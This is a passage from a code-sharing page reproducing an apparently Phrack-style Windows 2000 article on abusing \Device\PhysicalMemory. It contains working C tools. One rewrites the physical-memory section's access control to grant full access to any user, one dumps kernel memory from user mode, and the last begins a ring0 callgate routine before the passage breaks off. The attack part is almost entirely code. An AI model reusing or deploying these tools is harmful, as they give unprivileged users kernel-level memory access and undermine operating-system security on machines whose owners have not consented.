📄 玩转windows -dev-mem.txt
字号:
/*198*/ PVOID VadHint;
/*19C*/ PVOID CloneRoot;
/*1A0*/ DWORD NumberOfPrivatePages;
/*1A4*/ DWORD NumberOfLockedPages;
/*1A8*/ WORD NextPageColor;
/*1AA*/ BOOLEAN ExitProcessCalled;
/*1AB*/ BOOLEAN CreateProcessReported;
/*1AC*/ HANDLE SectionHandle;
/*1B0*/ PVOID Peb;
/*1B4*/ PVOID SectionBaseAddress;
/*1B8*/ PVOID QuotaBlock;
/*1BC*/ NTSTATUS LastThreadExitStatus;
/*1C0*/ DWORD WorkingSetWatch;
/*1C4*/ HANDLE Win32WindowStation;
/*1C8*/ DWORD InheritedFromUniqueProcessId;
/*1CC*/ ACCESS_MASK GrantedAccess;
/*1D0*/ DWORD DefaultHardErrorProcessing; // HEM_*
/*1D4*/ DWORD LdtInformation;
/*1D8*/ PVOID VadFreeHint;
/*1DC*/ DWORD VdmObjects;
/*1E0*/ PVOID DeviceMap;
/*1E4*/ DWORD SessionId;
/*1E8*/ LIST_ENTRY PhysicalVadList;
/*1F0*/ PVOID PageDirectoryPte;
/*1F4*/ DWORD dw1F4;
/*1F8*/ DWORD PaePageDirectoryPage;
/*1FC*/ CHAR ImageFileName[16];
/*20C*/ DWORD VmTrimFaultValue;
/*210*/ BYTE SetTimerResolution;
/*211*/ BYTE PriorityClass;
/*212*/ WORD SubSystemVersion;
/*214*/ PVOID Win32Process;
/*218*/ PVOID Job;
/*21C*/ DWORD JobStatus;
/*220*/ LIST_ENTRY JobLinks;
/*228*/ PVOID LockedPagesList;
/*22C*/ PVOID SecurityPort;
/*230*/ PVOID Wow64;
/*234*/ DWORD dw234;
/*238*/ IO_COUNTERS IoCounters;
/*268*/ DWORD CommitChargeLimit;
/*26C*/ DWORD CommitChargePeak;
/*270*/ LIST_ENTRY ThreadListHead;
/*278*/ PVOID VadPhysicalPagesBitMap;
/*27C*/ DWORD VadPhysicalPages;
/*280*/ DWORD AweLock;
/*284*/ } EPROCESS, *PEPROCESS;
// copy ntdll.lib from Microsoft DDK to current directory
#pragma comment(lib, "ntdll")
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS _stdcall
IMP_SYSCALL
NtMapViewOfSection(HANDLE SectionHandle,
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
ULONG CommitSize,
PLARGE_INTEGER SectionOffset,
PSIZE_T ViewSize,
SECTION_INHERIT InheritDisposition,
ULONG AllocationType,
ULONG Protect);
IMP_SYSCALL
NtUnmapViewOfSection(HANDLE ProcessHandle,
PVOID BaseAddress);
IMP_SYSCALL
NtOpenSection(PHANDLE SectionHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes);
IMP_SYSCALL
NtClose(HANDLE Handle);
IMP_SYSCALL
NtCreateSymbolicLinkObject(PHANDLE SymLinkHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PUNICODE_STRING TargetName);
----[ 5.2 chmod_mem.c
#include <stdio.h>
#include <windows.h>
#include <aclapi.h>
#include "..\kmem.h"
void usage(char *n) {
printf("usage: %s (/current | /user) [who]\n", n);
printf("/current: add all access to current user\n");
printf("/user : add all access to user 'who'\n");
exit(0);
}
int main(int argc, char **argv) {
HANDLE Section;
DWORD Res;
NTSTATUS ntS;
PACL OldDacl=NULL, NewDacl=NULL;
PSECURITY_DESCRIPTOR SecDesc=NULL;
EXPLICIT_ACCESS Access;
OBJECT_ATTRIBUTES ObAttributes;
INIT_UNICODE(ObName, L"\\Device\\PhysicalMemory");
BOOL mode;
if (argc < 2)
usage(argv[0]);
if (!strcmp(argv[1], "/current")) {
mode = 1;
} else if (!strcmp(argv[1], "/user") && argc == 3) {
mode = 2;
} else
usage(argv[0]);
memset(&Access, 0, sizeof(EXPLICIT_ACCESS));
InitializeObjectAttributes(&ObAttributes,
&ObName,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
NULL);
// open handle de \Device\PhysicalMemory
ntS = NtOpenSection(&Section, WRITE_DAC | READ_CONTROL, &ObAttributes);
if (ntS != STATUS_SUCCESS) {
printf("error: NtOpenSection (code: %x)\n", ntS);
goto cleanup;
}
// retrieve a copy of the security descriptor
Res = GetSecurityInfo(Section, SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION, NULL, NULL, &OldDacl,
NULL, &SecDesc);
if (Res != ERROR_SUCCESS) {
printf("error: GetSecurityInfo (code: %lu)\n", Res);
goto cleanup;
}
Access.grfAccessPermissions = SECTION_ALL_ACCESS; // :P
Access.grfAccessMode = GRANT_ACCESS;
Access.grfInheritance = NO_INHERITANCE;
Access.Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
// change these informations to grant access to a group or other user
Access.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
Access.Trustee.TrusteeType = TRUSTEE_IS_USER;
if (mode == 1)
Access.Trustee.ptstrName = "CURRENT_USER";
else
Access.Trustee.ptstrName = argv[2];
// create the new ACL
Res = SetEntriesInAcl(1, &Access, OldDacl, &NewDacl);
if (Res != ERROR_SUCCESS) {
printf("error: SetEntriesInAcl (code: %lu)\n", Res);
goto cleanup;
}
// update ACL
Res = SetSecurityInfo(Section, SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION, NULL, NULL, NewDacl,
NULL);
if (Res != ERROR_SUCCESS) {
printf("error: SetEntriesInAcl (code: %lu)\n", Res);
goto cleanup;
}
printf("\\Device\\PhysicalMemory chmoded\n");
cleanup:
if (Section)
NtClose(Section);
if (SecDesc)
LocalFree(SecDesc);
return(0);
}
----[ 5.3 winkdump.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "..\kmem.h"
ULONG Granularity;
// thanx to kraken for the hexdump function
void hexdump(unsigned char *data, unsigned int amount) {
unsigned int dp, p;
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~...................................."
"....................................................."
"........................................";
for (dp = 1; dp <= amount; dp++) {
printf ("%02x ", data[dp-1]);
if ((dp % 8) == 0)
printf (" ");
if ((dp % 16) == 0) {
printf ("| ");
p = dp;
for (dp -= 16; dp < p; dp++)
printf ("%c", trans[data[dp]]);
printf ("\n");
}
}
if ((amount % 16) != 0) {
p = dp = 16 - (amount % 16);
for (dp = p; dp > 0; dp--) {
printf (" ");
if (((dp % 8) == 0) && (p != 8))
printf (" ");
}
printf (" | ");
for (dp = (amount - (16 - p)); dp < amount; dp++)
printf ("%c", trans[data[dp]]);
}
printf ("\n");
return ;
}
PHYSICAL_ADDRESS GetPhysicalAddress(ULONG vAddress) {
PHYSICAL_ADDRESS add;
if (vAddress < 0x80000000L || vAddress >= 0xA0000000L)
add.QuadPart = (ULONGLONG) vAddress & 0xFFFF000;
else
add.QuadPart = (ULONGLONG) vAddress & 0x1FFFF000;
return(add);
}
int InitSection(PHANDLE Section) {
NTSTATUS ntS;
OBJECT_ATTRIBUTES ObAttributes;
INIT_UNICODE(ObString, L"\\Device\\PhysicalMemory");
InitializeObjectAttributes(&ObAttributes,
&ObString,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
NULL);
// open \Device\PhysicalMemory
ntS = NtOpenSection(Section,
SECTION_MAP_READ,
&ObAttributes);
if (ntS != STATUS_SUCCESS) {
printf(" * error NtOpenSection (code: %x)\n", ntS);
return(0);
}
return(1);
}
int main(int argc, char **argv) {
NTSTATUS ntS;
ULONG Address, Size, MappedSize, Offset;
HANDLE Section;
PVOID MappedAddress=NULL;
SYSTEM_INFO SysInfo;
PHYSICAL_ADDRESS pAddress;
printf(" *** win2k memory dumper ***\n\n");
if (argc != 3) {
printf("usage: %s <address> <size>\n", argv[0]);
return(0);
}
Address = strtoul(argv[1], NULL, 0);
MappedSize = Size = strtoul(argv[2], NULL, 10);
printf(" Virtual Address : 0x%.8x\n", Address);
if (!Size) {
printf("error: invalid size\n");
return(0);
}
// get allocation granularity information
GetSystemInfo(&SysInfo);
Granularity = SysInfo.dwAllocationGranularity;
printf(" Allocation granularity: %lu bytes\n", Granularity);
if (!InitSection(&Section))
return(0);
Offset = Address % Granularity;
MappedSize += Offset; // reajust mapping view
printf(" Offset : 0x%x\n", Offset);
pAddress = GetPhysicalAddress(Address - Offset);
printf(" Physical Address : 0x%.16x\n", pAddress);
ntS = NtMapViewOfSection(Section, (HANDLE) -1, &MappedAddress, 0L,
MappedSize, &pAddress, &MappedSize, ViewShare,
0, PAGE_READONLY);
printf(" Mapped size : %lu bytes\n", MappedSize);
printf(" View size : %lu bytes\n\n", Size);
if (ntS == STATUS_SUCCESS) {
hexdump((char *)MappedAddress+Offset, Size);
NtUnmapViewOfSection((HANDLE) -1, MappedAddress);
} else {
if (ntS == 0xC00000F4L)
printf("error: invalid physical address translation\n");
else
printf("error: NtMapViewOfSection (code: %x)\n", ntS);
}
NtClose(Section);
return(0);
}
----[ 5.2 winkps.c
// code very messy but working :)
#include <stdio.h>
#include <windows.h>
#include "..\kmem.h"
// get this address from win2k symbols
#define PSADD 0x8046A180 // PsActiveProcessHead
// default base address for ntoskrnl.exe on win2k
#define BASEADD 0x7FFE0000 // MmGetPhysicalAddress
// max process, to prevent easy crashing
#define MAX_PROCESS 50
typedef struct _MY_CG {
PHYSICAL_ADDRESS pAddress;
PVOID MappedAddress;
PCALLGATE_DESCRIPTOR Desc;
WORD Segment;
WORD LastEntry;
} MY_CG, *PMY_CG;
ULONG Granularity;
PLIST_ENTRY PsActiveProcessHead = (PLIST_ENTRY) PSADD;
MY_CG GdtMap;
MAPPING CurMap;
PHYSICAL_ADDRESS (*MmGetPhysicalAddress) (PVOID BaseAddress);
void __declspec(naked) Ring0Func() {
_asm {
pushad
pushf
cli
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -